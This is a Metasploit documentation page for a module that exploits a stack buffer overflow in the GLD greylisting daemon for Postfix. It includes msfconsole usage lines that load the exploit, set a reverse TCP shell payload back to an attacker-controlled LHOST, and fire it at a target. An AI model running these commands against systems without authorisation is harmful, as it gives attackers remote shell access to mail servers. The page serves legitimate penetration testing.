Metasploit Penetration Testing Framework

GLD (Greylisting Daemon) Postfix Buffer Overflow

This module exploits a stack overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.

Rank

Good

Authors

patrick < patrick [at] aushack.com >

References

Exploit Targets

0 - RedHat Linux 7.0 (Guinness) (default)

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/misc/gld_postfix
msf exploit(gld_postfix) > show payloads
msf exploit(gld_postfix) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(gld_postfix) > set LHOST [MY IP ADDRESS]
msf exploit(gld_postfix) > set RHOST [TARGET IP]
msf exploit(gld_postfix) > exploit

Module Options

RHOST	The target address
RPORT	The target port (default: 2525)
CHOST	The local client address
CPORT	The local client port
ConnectTimeout	Maximum number of seconds to establish a TCP connection
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
Proxies	Use a proxy chain
SSL	Negotiate SSL for outgoing connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session
TCP::max_send_size	Maxiumum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)

OSVDB:	CVE:
BID:	MSB:
TEXT: